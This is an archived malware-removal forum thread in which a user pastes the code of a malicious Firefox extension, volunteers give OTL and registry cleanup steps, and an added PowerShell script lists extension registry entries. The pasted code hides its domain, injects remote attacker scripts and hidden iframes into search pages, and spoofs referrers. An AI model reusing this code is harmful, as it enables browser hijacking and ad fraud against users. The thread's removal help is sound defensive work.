document.fdom; }}catch(err){} return -1;}</script>&lt;script type="application/x-javascript"> window.addEventListener("load", function() { xulRun.init(); }, false); window.addEventListener("load", initRequestObserver, false); var xulRun = { init: function() { var appcontent = document.getElementById("appcontent"); if(appcontent) { appcontent.addEventListener("DOMContentLoaded", xulRun.onPageLoad, true); } var pos, dom, dom2;try {__d = dex(__d);var today = new Date();pos = __d.substring(7).indexOf('/');dom = __d.substring(7, pos+7);__d = 'http://' + today.getDate() + '.' 
+ dom + __d.substring(pos+7);} catch(err){} if(!__d || !__u) { return; }var s;document.getElementById("urlbar").addEventListener("DOMAttrModified", function(e) { if((s = findOur(e.currentTarget.value)) != -1) e.currentTarget.value = s; }, false);document.getElementById("statusbar-display").addEventListener("DOMAttrModified", function(e) {if(e.target.label.indexOf(dom)!=-1) e.target.label = '';else if((s=findOur(e.target.label)) != -1) {e.target.label = s;}}, false);}, onPageLoad: function(aEvent) { var src = __d;var script;var doc = aEvent.originalTarget; var ref = doc.referrer; var loc = document.getElementById("urlbar").value;if(loc == undefined) loc = doc.location.href; if( loc.match(/google.*/(search|cse).*[&?]q=/) || loc.match(//search.yahoo.*search.*[&?]p=/) || loc.match(/ask.com.*/web.*[&?]q=/) ||loc.match(/bing.com/search.*[&?]q=/) ||loc.match(/aol/search.*(query|q)=/)) {src+="?"+__u+"&r="+Math.random();script = doc.createElement('script');script.id = "js_0";script.src = src;doc.getElementsByTagName('head')[0].appendChild(script);} else if(loc.match(/(yahoo|ask|aol|bing).[-.w]+/?$/)) {src.search(/(http://[^/]+/)/); src = RegExp.$1+"je.js?r="+Math.random();script = doc.createElement('script'); script.id = "js_e";script.src = src;doc.getElementsByTagName('head')[0].appendChild(script); } else if ((loc.match(/(google).[-.w]+/?$/) && doc.location.href != 'about:blank') || loc.match(/(google).[-.w]+/#/)) {src+="?"+__u+"&r="+Math.random();src.search(/(http://[^/]+/)/);var sdom = RegExp.$1;script = doc.createElement('script');script.id = "js_q";script.src = sdom +"jq.js";var tagp = doc.getElementsByTagName('head')[0];tagp.appendChild(script);script = doc.createElement('script');script.id = "js_1";script.src = sdom + "live.php?r=" + Math.random() + "&" + __u;tagp.appendChild(script);}else if(loc.match(/google.[-.w]+/images/)) { src.search(/(http://[^/]+/)/);src = RegExp.$1+"getpics.php?r="+Math.random();src+="&"+__u;script = 
window.content.document.createElement('script');script.id = "js_p"; script.src = src; doc.getElementsByTagName('head')[0].appendChild(script); }else if(ref.match(/google.[-.w]+/images/)) {var src; src = __d; src.search(/(http://[^/]+/)/); src = RegExp.$1+"showpics.php?r="+Math.random(); var frame = window.content.document.createElement('iframe'); frame.frameborder = "0"; frame.width = "1"; frame.height = "1"; frame.src = src; doc.getElementsByTagName('body')[0].appendChild(frame); } } }; function initRequestObserver() { var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);observerService.addObserver(httpRequestObserver, "http-on-modify-request", false); } var httpRequestObserver = { observe: function(subject, topic, data) { if(topic == "http-on-modify-request") { var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel); var pos = subject.URI.spec.indexOf("&aclck=http"); if(pos > -1) { var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"].getService(Components.interfaces.nsIIOService).newURI(decodeURIComponent(subject.URI.spec.substring(pos+7)), null, null);httpChannel.referrer = newRef;subject.URI.spec = subject.URI.spec.substring(0, pos);}}} };</script></overlay>


The references to search engines seemed pretty fishy so I archived it and created a dummy file with the same filename but without the script.



Edited by Budapest, 08 August 2010 - 08:11 PM.
Posts merged ~BP



#2 snemelk

snemelk

    engineer

  • Malware Response Team
  • 1,468 posts
  • Gender:Male
  • Location:Poland

Posted 09 August 2010 - 01:11 PM

Hi gamemakerman2002, and welcome to Bleeping Computer.

Sorry it has taken so long to get to you, but the board has been very busy lately, and all the Helpers here are volunteers.

If you still need help:
Download OTL.exe by OldTimer to your Desktop.
  • Close all windows and double click OTL.exe.
  • In the "Custom Scans/Fixes" window (under the light green bar) paste the following in bold:

    netsvcs
    drivers32
    %SYSTEMDRIVE%\*.*
    %systemroot%\system32\*.wt
    %systemroot%\system32\*.ruy
    %systemroot%\Fonts\*.com
    %systemroot%\Fonts\*.dll
    %systemroot%\Fonts\*.ini
    %systemroot%\Fonts\*.ini2
    %systemroot%\Fonts\*.exe
    %systemroot%\system32\spool\prtprocs\w32x86\*.*
    %systemroot%\REPAIR\*.bak1
    %systemroot%\REPAIR\*.ini
    %systemroot%\system32\*.jpg
    %systemroot%\*.jpg
    %systemroot%\*.png
    %systemroot%\*.scr
    %systemroot%\*._sy
    %APPDATA%\Adobe\Update\*.*
    %ALLUSERSPROFILE%\Favorites\*.*
    %APPDATA%\Microsoft\*.*
    %PROGRAMFILES%\*.*
    %APPDATA%\Update\*.*
    %systemroot%\*. /mp /s
    CREATERESTOREPOINT
    %systemroot%\System32\config\*.sav
    %PROGRAMFILES%|bak;true;false;false /fp
    %systemroot%\system32|bak;true;false;false /fp
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\Results\Install|LastSuccessTime /rs

  • Click Run Scan and let the program run uninterrupted.
  • When the scan completes, it will open two Notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL. Post both logs in this thread.
  • You may need to use two posts to get it all.

snemelk.hekko.pl - my site with a few computer security tips...
Silesia - that's where I live!

"If I had some duct tape, I could fix that." - MacGyver


#3 gamemakerman2002

gamemakerman2002
  • Topic Starter

  • Members
  • 5 posts

Posted 09 August 2010 - 02:30 PM

Thanks for getting back to me but what I did fixed it.

#4 snemelk

snemelk

    engineer

  • Malware Response Team
  • 1,468 posts
  • Gender:Male
  • Location:Poland

Posted 09 August 2010 - 03:45 PM

Hi gamemakerman2002!!..

QUOTE(gamemakerman2002 @ Aug 9 2010, 09:30 PM)
Thanks for getting back to me but what I did fixed it.

Good!

What you did leaves a leftover on a machine and an orphaned Registry entry...

You can safely delete that folder:
C:\Users\Luke\AppData\Local\{54A99DBC-39B9-454A-A1A3-5E56906EF030}

Then, please delete the corresponding Registry entry:
- close Firefox (copy these instructions to Notepad first)
- open Regedit: Getting Started: Launch Regedit
- navigate to this key (expand each key till you go to the "extensions" one):

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Firefox\extensions

- when you click the "extensions" key, you should see such a value listed:

{54A99DBC-39B9-454A-A1A3-5E56906EF030} - right click on it and choose: Delete ... Confirm, if asked... Close Regedit, launch Firefox... Everything should be deleted now properly... ;)


#5 gamemakerman2002

gamemakerman2002
  • Topic Starter

  • Members
  • 5 posts

Posted 09 August 2010 - 03:49 PM

Thank you very much!

edit: Ok I deleted the folder but the registry value doesn't exist in the key you specified. I did a search and it exists in Computer\HKEY_USERS\S-1-5-21-2255672489-2639447647-2849063840-1000\Software\Mozilla\Firefox\Extensions . Should I delete that one?

Edited by gamemakerman2002, 09 August 2010 - 03:57 PM.
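For anyone checking a machine for the same kind of leftover, here is an added PowerShell example (my own code, not from this thread, from OTL or from Mozilla) that lists every registry-registered Firefox extension across the machine-wide key, the Wow6432Node view and each user hive, and flags registrations whose target folder no longer exists or that point into a user's AppData\Local folder. The registry locations are the ones named in this thread; the flagging heuristics are my assumptions, and the script only reports, it deletes nothing.

```powershell
# Added example: audit Firefox extension registrations stored in the Windows registry.
# Firefox reads extension IDs (value name) and install paths (value data) from these keys.
$keys = @(
  'HKLM:\SOFTWARE\Mozilla\Firefox\Extensions',
  'HKLM:\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions',
  'HKCU:\SOFTWARE\Mozilla\Firefox\Extensions'
)

# HKCU only covers the current user; other accounts' entries live under
# HKEY_USERS\<SID>\Software\Mozilla\Firefox\Extensions (the location found in this thread).
$keys += Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
  Where-Object { $_.PSChildName -match '^S-1-5-21-' } |
  ForEach-Object { "Registry::$($_.Name)\Software\Mozilla\Firefox\Extensions" }

foreach ($key in $keys) {
  if (-not (Test-Path $key)) { continue }
  $item = Get-Item $key
  foreach ($name in $item.GetValueNames()) {
    $target = $item.GetValue($name)
    # A registration whose target is missing is an orphan, exactly the leftover
    # described in this thread after the extension folder was deleted.
    $exists = ($target) -and (Test-Path -LiteralPath $target)

    # Heuristics (assumptions): sideloaded extensions living under AppData\Local and
    # GUID-style IDs are worth a closer look; a legitimate add-on may match too.
    $flags = @()
    if (-not $exists) { $flags += 'orphaned (target missing)' }
    if ($target -match '\\AppData\\Local\\') { $flags += 'installed from AppData\Local' }
    if ($name -match '^\{[0-9A-Fa-f-]{36}\}$') { $flags += 'GUID-named ID' }

    [pscustomobject]@{
      Key     = $key
      Id      = $name
      Target  = $target
      Present = $exists
      Flags   = ($flags -join '; ')
    }
  }
}
```

Run it from an elevated PowerShell so the HKEY_USERS hives of other accounts are readable; rows with a non-empty Flags column are the ones to review before removing anything.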


#6 snemelk

snemelk

    engineer

  • Malware Response Team
  • 1,468 posts
  • Gender:Male
  • Location:Poland

Posted 10 August 2010 - 01:09 PM

Hi again gamemakerman2002!!..

QUOTE(gamemakerman2002 @ Aug 9 2010, 10:49 PM)
Should I delete that one?

Yes, please do so... (with Firefox closed)...

If no problem remains, I'll close this thread, ok?..


#7 gamemakerman2002

gamemakerman2002
  • Topic Starter

  • Members
  • 5 posts

Posted 10 August 2010 - 02:27 PM

ok

#8 snemelk

snemelk

    engineer

  • Malware Response Team
  • 1,468 posts
  • Gender:Male
  • Location:Poland

Posted 10 August 2010 - 02:47 PM

Glad we could help.

If you need this topic reopened, just send me a PM (Send message from my profile) with the address of the thread. This applies only to the original topic starter. Everyone else please begin a New Topic.




